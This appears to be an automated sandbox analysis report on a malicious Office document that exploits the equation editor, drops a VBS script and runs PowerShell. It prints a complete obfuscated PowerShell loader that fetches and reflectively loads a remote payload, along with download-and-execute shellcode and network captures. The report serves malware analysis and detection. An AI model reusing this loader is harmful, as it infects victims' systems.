                                                                                            2024-12-04 11:21:04 UTC1369INData Raw: 37 30 30 30 0d 0a 74 72 69 6e 67 2c 20 66 69 6e 64 53 74 72 69 6e 67 29 20 2b 20 4c 65 6e 28 66 69 6e 64 53 74 72 69 6e 67 29 29 0d 0a 20 20 20 20 4c 6f 6f 70 0d 0a 20 20 20 20 0d 0a 20 20 20 20 43 75 73 74 6f 6d 52 65 70 6c 61 63 65 20 3d 20 72 65 73 75 6c 74 53 74 72 69 6e 67 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 0d 0a 70 72 69 76 61 74 65 20 73 75 62 20 41 53 53 45 52 54 45 52 52 28 6f 62 6a 2c 20 66 6f 72 6d 61 74 4f 70 74 69 6f 6e 29 0d 0a 20 20 20 20 64 69 6d 20 65 72 72 4e 6f 0d 0a 20 20 20 20 64 69 6d 20 65 72 72 44 65 73 63 0d 0a 20 20 20 20 64 69 6d 20 72 65 73 70 6f 6e 73 65 53 74 72 0d 0a 20 20 20 20 64 69 6d 20 66 6f 72 6d 61 74 74 65 64 53 74 72 0d 0a 0d 0a 20 20 20 20 69 66 20 45 72 72 2e 4e 75 6d 62 65 72 20 3c 3e 20 30 20 74 68 65 6e
                                                                                            Data Ascii: 7000tring, findString) + Len(findString)) Loop CustomReplace = resultStringEnd Functionprivate sub ASSERTERR(obj, formatOption) dim errNo dim errDesc dim responseStr dim formattedStr if Err.Number <> 0 then
                                                                                            2024-12-04 11:21:04 UTC1369INData Raw: 70 76 4b 6c 4e 4c 62 4c 69 55 69 62 57 55 4b 4b 48 69 57 65 5a 69 57 57 6d 75 64 55 66 63 4b 4c 20 3d 20 22 65 50 6c 67 65 71 68 67 52 41 6d 67 6b 6c 6f 4c 69 7a 4b 75 74 74 4c 69 4c 6f 4c 57 55 41 78 4f 6c 6f 63 65 7a 69 70 6d 72 62 68 76 4f 42 4b 75 47 4c 57 4c 65 4b 65 6c 6b 6a 4b 76 64 63 4e 4f 57 57 69 6a 22 0d 0a 4b 4c 75 71 69 65 43 63 57 71 57 66 68 6a 4c 57 63 55 72 4c 6d 53 52 57 4e 70 4c 5a 70 68 65 66 4c 63 5a 42 70 64 61 67 57 62 6b 4c 72 47 69 5a 4c 4c 6e 68 6b 72 4c 55 57 63 63 4b 4c 5a 63 52 4e 70 57 57 20 3d 20 22 41 69 6c 69 69 52 67 4b 57 47 66 4b 50 4c 43 4c 5a 78 63 4e 7a 68 75 63 4c 68 6f 6b 68 52 65 6a 57 55 78 6f 57 55 52 4f 43 42 69 73 4c 63 43 66 50 55 4c 6e 66 42 4c 6d 78 71 66 4c 4e 42 43 65 50 67 6f 55 22 0d 0a 69 4b 41 4b 74
                                                                                            Data Ascii: pvKlNLbLiUibWUKKHiWeZiWWmudUfcKL = "ePlgeqhgRAmgkloLizKuttLiLoLWUAxOlocezipmrbhvOBKuGLWLeKelkjKvdcNOWWij"KLuqieCcWqWfhjLWcUrLmSRWNpLZphefLcZBpdagWbkLrGiZLLnhkrLUWccKLZcRNpWW = "AiliiRgKWGfKPLCLZxcNzhucLhokhRejWUxoWUROCBisLcCfPULnfBLmxqfLNBCePgoU"iKAKt
                                                                                            2024-12-04 11:21:05 UTC1369INData Raw: 68 43 78 57 6f 72 57 55 55 47 4f 69 78 4c 69 6f 52 57 4c 51 57 6b 6b 61 6c 6f 22 0d 0a 4c 4b 55 78 69 4c 66 4c 47 4e 64 49 41 62 4b 50 73 57 70 4f 42 55 6d 55 6d 4a 69 71 75 69 55 72 41 70 64 4f 61 57 48 47 7a 42 52 69 5a 69 78 57 69 76 57 41 57 42 42 50 57 69 50 4c 4e 43 4e 57 65 6b 71 4e 20 3d 20 22 63 5a 68 47 6f 4c 70 57 61 75 6d 63 4e 53 72 6b 72 6e 4e 4c 6c 50 4c 55 6e 7a 6b 4c 6d 61 53 5a 6c 4a 6b 4c 4c 62 69 78 4c 50 50 6d 73 6e 6e 69 47 4b 78 4c 63 43 75 57 75 47 63 69 63 7a 75 4b 6e 65 4e 41 22 0d 0a 71 62 47 49 63 57 61 6e 63 57 69 68 47 6b 72 6b 4b 6c 69 4e 7a 7a 69 7a 7a 4e 61 68 55 74 68 69 7a 62 42 69 57 6f 61 63 5a 57 41 57 4b 74 43 70 6e 6f 4b 4c 4e 4c 74 4b 51 69 6b 6e 6d 70 69 6b 70 51 4c 43 20 3d 20 22 6e 5a 63 57 42 63 68 41 4e 7a 67
                                                                                            Data Ascii: hCxWorWUUGOixLioRWLQWkkalo"LKUxiLfLGNdIAbKPsWpOBUmUmJiquiUrApdOaWHGzBRiZixWivWAWBBPWiPLNCNWekqN = "cZhGoLpWaumcNSrkrnNLlPLUnzkLmaSZlJkLLbixLPPmsnniGKxLcCuWuGciczuKneNA"qbGIcWancWihGkrkKliNzzizzNahUthizbBiWoacZWAWKtCpnoKLNLtKQiknmpikpQLC = "nZcWBchANzg


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249166142.215.209.784433768C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-04 11:21:10 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                            Host: 1017.filemail.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-04 11:21:10 UTC224INHTTP/1.1 400 Bad Request
                                                                                            Cache-Control: no-cache,no-store
                                                                                            Pragma: no-cache
                                                                                            Transfer-Encoding: chunked
                                                                                            Content-Type: application/json; charset=utf-8
                                                                                            Expires: -1
                                                                                            Date: Wed, 04 Dec 2024 11:21:10 GMT
                                                                                            Connection: close
                                                                                            2024-12-04 11:21:10 UTC284INData Raw: 31 31 35 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 50 72 65 64 69 63 61 74 65 56 61 6c 69 64 61 74 6f 72 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 69 73 20 69 6e 76 61 6c 69 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 49 6e 76 61 6c 69 64 52 65 71 75 65 73 74 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 30 61 36 62 31 36 61 36 2d 30 62 66 64 2d 34 30 34 32 2d 39 34 30 63 2d 38 64 38 30 61 34 36 39 33 66 39 38 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 50 72 65 64 69 63 61 74 65 56 61 6c 69 64 61 74 6f 72 5d 20 69 73
                                                                                            Data Ascii: 115{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"PredicateValidator","ErrorMessage":"is invalid"}],"responsestatus":"InvalidRequest","errorid":"0a6b16a6-0bfd-4042-940c-8d80a4693f98","errormessage":"transferid --> [PredicateValidator] is
                                                                                            2024-12-04 11:21:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:06:20:08
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x13fde0000
                                                                                            File size:28'253'536 bytes
                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:06:20:57
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:06:21:00
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs"
                                                                                            Imagebase:0x660000
                                                                                            File size:141'824 bytes
                                                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:06:21:05
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                            Imagebase:0x1100000
                                                                                            File size:427'008 bytes
                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:06:21:06
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"
                                                                                            Imagebase:0x1100000
                                                                                            File size:427'008 bytes
                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:13.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:52.5%
                                                                                              Total number of Nodes:61
                                                                                              Total number of Limit Nodes:2
                                                                                              execution_graph 375 35a015b 376 35a011a 375->376 379 35a030f ExitProcess 376->379 392 35a0328 379->392 393 35a032e 392->393 395 35a0335 393->395 404 35a0344 393->404 397 35a037d 395->397 414 35a036b 395->414 405 35a034a 404->405 406 35a036b 9 API calls 405->406 407 35a0351 405->407 406->407 408 35a03d7 407->408 409 35a0365 407->409 422 35a03ea LoadLibraryW 408->422 418 35a03d5 409->418 415 35a036e 414->415 416 35a03d5 9 API calls 415->416 417 35a037d 416->417 419 35a03d7 418->419 420 35a03ea 9 API calls 419->420 421 35a03dc 420->421 423 35a0404 8 API calls 422->423 424 35a03f1 423->424 425 35a0477 8 API calls 424->425 426 35a0415 424->426 425->426 373 35a04d1 GetPEB 374 35a04df 373->374 337 35a03ea LoadLibraryW 342 35a0404 337->342 343 35a0407 342->343 346 35a0477 URLDownloadToFileW 343->346 356 35a0490 346->356 349 35a0497 351 35a049f ShellExecuteW 349->351 352 35a0415 349->352 365 35a04ca 351->365 354 35a04be 354->352 355 35a04cd ExitProcess 354->355 357 35a0492 356->357 358 35a04a5 3 API calls 357->358 359 35a0497 358->359 360 35a049f ShellExecuteW 359->360 362 35a0480 359->362 361 35a04ca ExitProcess 360->361 363 35a04be 361->363 362->349 367 35a04a5 362->367 363->362 364 35a04cd ExitProcess 363->364 366 35a04cd ExitProcess 365->366 368 35a04a8 ShellExecuteW 367->368 369 35a04ca ExitProcess 368->369 370 35a04be 368->370 369->370 371 35a04cd ExitProcess 370->371 372 35a0505 370->372 372->349 447 35a00eb 448 35a00f8 447->448 449 35a030f 10 API calls 448->449 450 35a02fd 449->450 451 35a02e9 452 35a02fd 451->452 453 35a030f 10 API calls 451->453 453->452

                                                                                              Callgraph

                                                                                              Executed Functions

                                                                                              Function 035A0477 Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 35a0477-35a0491 URLDownloadToFileW call 35a0490 4 35a0497-35a049d 0->4 5 35a0492 call 35a04a5 0->5 6 35a049f-35a04c1 ShellExecuteW call 35a04ca 4->6 7 35a0504-35a0510 4->7 5->4 8 35a0513 6->8 20 35a04c3 6->20 7->8 10 35a051b-35a051f 8->10 11 35a0515-35a0519 8->11 14 35a0521-35a0525 10->14 15 35a0534-35a0536 10->15 11->10 13 35a0527-35a052e 11->13 17 35a0532 13->17 18 35a0530 13->18 14->13 14->15 19 35a0546-35a0547 15->19 17->15 21 35a0538-35a0541 17->21 18->15 20->15 22 35a04c5-35a04cf ExitProcess 20->22 25 35a050a-35a050d 21->25 26 35a0543 21->26 25->21 27 35a050f 25->27 26->19 27->8
                                                                                              APIs
                                                                                              • URLDownloadToFileW.URLMON(00000000,035A0415,?,00000000,00000000), ref: 035A0479
                                                                                                • Part of subcall function 035A0490: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035A04B7
                                                                                                • Part of subcall function 035A0490: ExitProcess.KERNEL32(00000000), ref: 035A04CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadExecuteExitFileProcessShell
                                                                                              • String ID:
                                                                                              • API String ID: 3584569557-0
                                                                                              • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                                              • Instruction ID: d7cd4f779e7c3ea9c1a855a0714aa10be1648f62df87d5be626e53b573b5012d
                                                                                              • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                                              • Instruction Fuzzy Hash: 82F027D066DB403DFA11E77CBC5EF5E6E64BF81B04F5548C9B1964F0F3E4A08404A625
                                                                                              Function 035A04A5 Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 29 35a04a5-35a04b7 ShellExecuteW 31 35a04be-35a04c1 29->31 32 35a04b9 call 35a04ca 29->32 34 35a0513 31->34 35 35a04c3 31->35 32->31 36 35a051b-35a051f 34->36 37 35a0515-35a0519 34->37 38 35a0534-35a0536 35->38 39 35a04c5-35a04cf ExitProcess 35->39 36->38 42 35a0521-35a0525 36->42 37->36 41 35a0527-35a052e 37->41 43 35a0546-35a0547 38->43 44 35a0532 41->44 45 35a0530 41->45 42->38 42->41 44->38 47 35a0538-35a0541 44->47 45->38 49 35a050a-35a050d 47->49 50 35a0543 47->50 49->47 51 35a050f 49->51 50->43 51->34
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035A04B7
                                                                                                • Part of subcall function 035A04CA: ExitProcess.KERNEL32(00000000), ref: 035A04CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteExitProcessShell
                                                                                              • String ID:
                                                                                              • API String ID: 1124553745-0
                                                                                              • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                                              • Instruction ID: 5fd94e6c97b52b91726c07fb8fd183d7a2f23c2b04e8821dac1bb6f169cc26eb
                                                                                              • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                                              • Instruction Fuzzy Hash: 4C01F7D9975B0211DB70E62CF8657EEA751BF49710F8C4842A595060F5D17490C3F61A
                                                                                              Function 035A0490 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 52 35a0490-35a049d call 35a04a5 56 35a049f-35a04c1 ShellExecuteW call 35a04ca 52->56 57 35a0504-35a0510 52->57 58 35a0513 56->58 70 35a04c3 56->70 57->58 60 35a051b-35a051f 58->60 61 35a0515-35a0519 58->61 64 35a0521-35a0525 60->64 65 35a0534-35a0536 60->65 61->60 63 35a0527-35a052e 61->63 67 35a0532 63->67 68 35a0530 63->68 64->63 64->65 69 35a0546-35a0547 65->69 67->65 71 35a0538-35a0541 67->71 68->65 70->65 72 35a04c5-35a04cf ExitProcess 70->72 75 35a050a-35a050d 71->75 76 35a0543 71->76 75->71 77 35a050f 75->77 76->69 77->58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteExitProcessShell
                                                                                              • String ID:
                                                                                              • API String ID: 1124553745-0
                                                                                              • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                                              • Instruction ID: abddaa7fe2f7600b964b7d0ac9073737d99eea50f8f5b4e4936dbde57016062a
                                                                                              • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                                              • Instruction Fuzzy Hash: 40014EE4579B0530E770E62CFC98B9EBAC1BF85714F588456E1910B0F1D2744442E61A
                                                                                              Function 035A03EA Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 79 35a03ea-35a03ec LoadLibraryW call 35a0404 81 35a03f1-35a040f 79->81 83 35a0415-35a0475 81->83 84 35a0410 call 35a0477 81->84 84->83
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(035A03DC), ref: 035A03EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 463438d4770890e14baa01494bbd25403399f7607832ad2a81bf9441fdeed92c
                                                                                              • Instruction ID: 85131e5523419b4854458f5b12f097fef8d9ba59f70c6100d1e62b974b3a43b6
                                                                                              • Opcode Fuzzy Hash: 463438d4770890e14baa01494bbd25403399f7607832ad2a81bf9441fdeed92c
                                                                                              • Instruction Fuzzy Hash: B111D39285DBC21FC71387741D7A629BF643A23004B5DCACED0D60A8E3E3899156D797
                                                                                              Function 035A04CA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 89 35a04ca-35a04cf ExitProcess
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(00000000), ref: 035A04CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                              • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                                              • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 035A04D1 Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 91 35a04d1-35a04dc GetPEB 92 35a04df-35a04f0 call 35a04f9 91->92 95 35a04f2-35a04f6 92->95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_35a0000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                              • Instruction ID: 47d9ef8f3190c6dc25704d569a32412db4d07f6223e85532229ff3c078ad15ae
                                                                                              • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                                              • Instruction Fuzzy Hash: B3D09E752119029FD315DB08D940E56F37AFFD8611B14C264D5054B669D730EC92DB94

                                                                                              Non-executed Functions

                                                                                              Function 035A030F Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 96 35a030f-35a0336 ExitProcess call 35a0328 call 35a0344 101 35a0389-35a03a9 96->101 102 35a0339 96->102 103 35a03aa-35a03d3 101->103 102->103 104 35a033b-35a0363 call 35a036b 102->104 116 35a03d7-35a03e8 call 35a03ea 104->116 117 35a0365-35a0386 call 35a03d5 104->117 117->101
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(035A02FD), ref: 035A030F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
